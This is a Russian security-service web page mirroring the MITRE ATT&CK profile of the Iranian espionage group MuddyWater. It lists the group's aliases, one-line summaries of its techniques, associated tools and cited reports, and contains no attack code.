Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа MuddyWater
Риски
Каталоги
MITRE ATT&CK
Преступная группа
MuddyWater
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

MuddyWater

MuddyWater is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, MuddyWater has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)
ID: G0069
Associated Groups: Seedworm, TA450, Earth Vetala, Mango Sandstorm, TEMP.Zagros, Static Kitten, MERCURY
Version: 5.1
Created: 18 Apr 2018
Last Modified: 29 Aug 2024

Associated Group Descriptions
Name Description
Seedworm (Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
TA450 (Citation: Proofpoint TA450 Phishing March 2024)
Earth Vetala (Citation: Trend Micro Muddy Water March 2021)
Mango Sandstorm (Citation: Microsoft Threat Actor Naming July 2023)
TEMP.Zagros (Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
Static Kitten (Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
MERCURY (Citation: Anomali Static Kitten February 2021)

Techniques Used
Domain ID Name Use
Enterprise T1548 .002 Abuse Elevation Control Mechanism: Bypass User Account Control

MuddyWater uses various techniques to bypass UAC.(Citation: ClearSky MuddyWater Nov 2018)
Enterprise T1087 .002 Account Discovery: Domain Account

MuddyWater has used cmd.exe net user /domain to enumerate domain users.(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1583 .006 Acquire Infrastructure: Web Services

MuddyWater has used file sharing services including OneHub, Sync, and TeraBox to distribute tools.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

MuddyWater has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1560 .001 Archive Collected Data: Archive via Utility

MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.(Citation: Symantec MuddyWater Dec 2018)
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

MuddyWater has added Registry Run key KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

MuddyWater has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)
.003 Command and Scripting Interpreter: Windows Command Shell

MuddyWater has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018)

.005 Command and Scripting Interpreter: Visual Basic

MuddyWater has used VBScript files to execute its POWERSTATS payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)

.006 Command and Scripting Interpreter: Python

MuddyWater has developed tools in Python including Out1.(Citation: Trend Micro Muddy Water March 2021)

.007 Command and Scripting Interpreter: JavaScript

MuddyWater has used JavaScript files to execute its POWERSTATS payload.(Citation: ClearSky MuddyWater Nov 2018)(Citation: FireEye MuddyWater Mar 2018)(Citation: DHS CISA AA22-055A MuddyWater February 2022)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1132 .001 Data Encoding: Standard Encoding

MuddyWater has used tools to encode C2 communications including Base64 encoding.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1074 .001 Data Staged: Local Data Staging

MuddyWater has stored a decoy PDF file within a victim's `%temp%` folder.(Citation: Talos MuddyWater Jan 2022)
Enterprise T1573 .001 Encrypted Channel: Symmetric Cryptography

MuddyWater has used AES to encrypt C2 responses.(Citation: Talos MuddyWater Jan 2022)
Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

MuddyWater has specifically targeted government agency employees with spearphishing e-mails.(Citation: Anomali Static Kitten February 2021)

Enterprise T1574 .001 Hijack Execution Flow: DLL

MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

MuddyWater can disable the system's local proxy settings.(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1559 .001 Inter-Process Communication: Component Object Model

MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)
.002 Inter-Process Communication: Dynamic Data Exchange

MuddyWater has used malware that can execute PowerShell scripts via DDE.(Citation: Securelist MuddyWater Oct 2018)

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender.(Citation: FireEye MuddyWater Mar 2018)(Citation: Talos MuddyWater May 2019)(Citation: Anomali Static Kitten February 2021)
Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

MuddyWater has performed credential dumping with Mimikatz and procdump64.exe.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)
.004 OS Credential Dumping: LSA Secrets

MuddyWater has performed credential dumping with LaZagne.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)

.005 OS Credential Dumping: Cached Domain Credentials

MuddyWater has performed credential dumping with LaZagne.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)

Enterprise T1027 .003 Obfuscated Files or Information: Steganography

MuddyWater has stored obfuscated JavaScript code in an image file named temp.jpg.(Citation: ClearSky MuddyWater Nov 2018)
.004 Obfuscated Files or Information: Compile After Delivery

MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.(Citation: ClearSky MuddyWater Nov 2018)

.010 Obfuscated Files or Information: Command Obfuscation

MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: GitHub Invoke-Obfuscation) The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)

Enterprise T1588 .002 Obtain Capabilities: Tool

MuddyWater has used legitimate tools ConnectWise, RemoteUtilities, and SimpleHelp to gain access to the target environment.(Citation: Anomali Static Kitten February 2021)(Citation: group-ib_muddywater_infra)
Enterprise T1137 .001 Office Application Startup: Office Template Macros

MuddyWater has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)
Enterprise T1566 .001 Phishing: Spearphishing Attachment

MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021) (Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Proofpoint TA450 Phishing March 2024)
.002 Phishing: Spearphishing Link

MuddyWater has sent targeted spearphishing e-mails with malicious links.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)

Enterprise T1090 .002 Proxy: External Proxy

MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.(Citation: Symantec MuddyWater Dec 2018) MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

MuddyWater has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)
Enterprise T1518 .001 Software Discovery: Security Software Discovery

MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.(Citation: Securelist MuddyWater Oct 2018)
Enterprise T1218 .003 System Binary Proxy Execution: CMSTP

MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.(Citation: FireEye MuddyWater Mar 2018)
.005 System Binary Proxy Execution: Mshta

MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)

.011 System Binary Proxy Execution: Rundll32

MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

MuddyWater has run a tool that steals passwords saved in victim email.(Citation: Symantec MuddyWater Dec 2018)
Enterprise T1204 .001 User Execution: Malicious Link

MuddyWater has distributed URLs in phishing e-mails that link to lure documents.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Proofpoint TA450 Phishing March 2024)
.002 User Execution: Malicious File

MuddyWater has attempted to get users to open malicious PDF attachment and to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: Proofpoint TA450 Phishing March 2024)

Enterprise T1102 .002 Web Service: Bidirectional Communication

MuddyWater has used web services including OneHub to distribute remote access tools.(Citation: Anomali Static Kitten February 2021)

Software
ID Name References Techniques
S0592 RemoteUtilities (Citation: Trend Micro Muddy Water March 2021) Screen Capture, Msiexec, File and Directory Discovery, Ingress Tool Transfer
S0194 PowerSploit (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0363 Empire (Citation: EmPyre) (Citation: GitHub ATTACK Empire) (Citation: Github PowerShell Empire) (Citation: NCSC Joint Report Public Tools) (Citation: PowerShell Empire) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Keylogging, Path Interception by PATH Environment Variable, Bypass User Account Control, Group Policy Discovery, Local Email Collection, Domain Account, Local Account, Windows Service, SSH, DLL, Automated Collection, Clipboard Data, Network Sniffing, Network Share Discovery, System Information Discovery, Native API, Process Injection, Timestomp, Shortcut Modification, Security Support Provider, Archive Collected Data, Credentials from Web Browsers, Path Interception by Search Order Hijacking, Group Policy Modification, Browser Information Discovery, Private Keys, Local Account, LLMNR/NBT-NS Poisoning and SMB Relay, LSASS Memory, Create Process with Token, Distributed Component Object Model, Video Capture, System Network Configuration Discovery, Accessibility Features, Command and Scripting Interpreter, Domain Account, Domain Trust Discovery, Golden Ticket, Automated Exfiltration, File and Directory Discovery, System Network Connections Discovery, Credentials In Files, Exfiltration to Code Repository, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Exploitation of Remote Services, Registry Run Keys / Startup Folder, Exploitation for Privilege Escalation, SID-History Injection, Bidirectional Communication, Asymmetric Cryptography, Exfiltration to Cloud Storage, Path Interception by Unquoted Path, MSBuild, Security Software Discovery, Windows Command Shell, Silver Ticket, Command Obfuscation, Access Token Manipulation, Web Protocols, Network Service Discovery, Pass the Hash, Ingress Tool Transfer, Service Execution, Kerberoasting, Credential API Hooking, Commonly Used Port, Dylib Hijacking
S0450 SHARPSTATS (Citation: TrendMicro POWERSTATS V3 June 2019) System Owner/User Discovery, System Information Discovery, System Network Configuration Discovery, PowerShell, Command Obfuscation, Ingress Tool Transfer, System Time Discovery
S1047 Mori (Citation: CYBERCOM Iranian Intel Cyber January 2022) (Citation: DHS CISA AA22-055A MuddyWater February 2022) Standard Encoding, DNS, Deobfuscate/Decode Files or Information, Modify Registry, Regsvr32, Query Registry, File Deletion, Web Protocols, Junk Data
S0594 Out1 (Citation: Trend Micro Muddy Water March 2021) Local Email Collection, Data from Local System, Obfuscated Files or Information, Windows Command Shell, Web Protocols
S0591 ConnectWise (Citation: Anomali Static Kitten February 2021) (Citation: ScreenConnect) (Citation: Trend Micro Muddy Water March 2021) Screen Capture, Video Capture, PowerShell
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: TrendMicro POWERSTATS V3 June 2019) (Citation: Unit 42 MuddyWater Nov 2017) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0349 LaZagne (Citation: GitHub LaZagne Dec 2018) (Citation: GitHub LaZange Dec 2018) (Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019) Keychain, LSA Secrets, Proc Filesystem, Credentials from Password Stores, Credentials from Web Browsers, LSASS Memory, Cached Domain Credentials, Credentials In Files, /etc/passwd and /etc/shadow, Windows Credential Manager
S1046 PowGoop (Citation: CYBERCOM Iranian Intel Cyber January 2022) (Citation: DHS CISA AA22-055A MuddyWater February 2022) Match Legitimate Resource Name or Location, DLL, Deobfuscate/Decode Files or Information, Masquerading, PowerShell, Encrypted Channel, Non-Standard Encoding, Web Protocols
S0488 CrackMapExec (Citation: CME Github September 2018) (Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019) Windows Management Instrumentation, Password Guessing, Security Account Manager, LSA Secrets, Domain Account, Domain Groups, Network Share Discovery, System Information Discovery, Modify Registry, Password Spraying, System Network Configuration Discovery, File and Directory Discovery, System Network Connections Discovery, PowerShell, Brute Force, Password Policy Discovery, Remote System Discovery, Pass the Hash, NTDS, At
S0250 Koadic (Citation: Github Koadic) (Citation: MalwareBytes LazyScripter Feb 2021) (Citation: Palo Alto Sofacy 06-2018) (Citation: Reaqta MuddyWater November 2017) (Citation: TrendMicro POWERSTATS V3 June 2019) Scheduled Task, Windows Management Instrumentation, System Owner/User Discovery, Rundll32, Bypass User Account Control, Security Account Manager, Clipboard Data, Network Share Discovery, System Information Discovery, Data from Local System, System Network Configuration Discovery, File and Directory Discovery, Mshta, PowerShell, Registry Run Keys / Startup Folder, Regsvr32, Asymmetric Cryptography, Hidden Window, Windows Command Shell, Web Protocols, Visual Basic, Network Service Discovery, Ingress Tool Transfer, Remote Desktop Protocol, NTDS, Service Execution, Dynamic-link Library Injection
S1037 STARWHALE (Citation: CANOPY) (Citation: DHS CISA AA22-055A MuddyWater February 2022) (Citation: Mandiant UNC3313 Feb 2022) System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Local Data Staging, Malicious File, Windows Service, System Information Discovery, Data from Local System, System Network Configuration Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Windows Command Shell, Web Protocols, Visual Basic
S0223 POWERSTATS (Citation: ClearSky MuddyWater June 2019) (Citation: ClearSky MuddyWater Nov 2018) (Citation: FireEye MuddyWater Mar 2018) (Citation: Powermud) (Citation: Symantec MuddyWater Dec 2018) (Citation: Unit 42 MuddyWater Nov 2017) Scheduled Task, Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Standard Encoding, JavaScript, Dynamic Data Exchange, Local Account, Component Object Model, System Information Discovery, Data from Local System, Deobfuscate/Decode Files or Information, Scheduled Transfer, Junk Code Insertion, External Proxy, System Network Configuration Discovery, Masquerade Task or Service, Mshta, Process Discovery, PowerShell, Disable or Modify Tools, Asymmetric Cryptography, Uncommonly Used Port, Security Software Discovery, Command Obfuscation, File Deletion, Visual Basic, Ingress Tool Transfer, Commonly Used Port
S1035 Small Sieve (Citation: DHS CISA AA22-055A MuddyWater February 2022) (Citation: GRAMDOOR) (Citation: Mandiant UNC3313 Feb 2022) (Citation: NCSC GCHQ Small Sieve Jan 2022) System Owner/User Discovery, Match Legitimate Resource Name or Location, System Network Configuration Discovery, Execution Guardrails, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Bidirectional Communication, Asymmetric Cryptography, Python, Windows Command Shell, Non-Standard Encoding, Web Protocols, Ingress Tool Transfer

References

  1. Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.
  2. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
  3. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
  4. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  5. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  6. Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
  7. Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.
  8. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  9. Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.
  10. Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
  11. Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
  12. Rostovcev, N. (2023, April 18). SimpleHarm: Tracking MuddyWater’s infrastructure. Retrieved July 11, 2024.
  13. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  14. Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.
  15. Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.
  16. Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
  17. Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.
  18. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.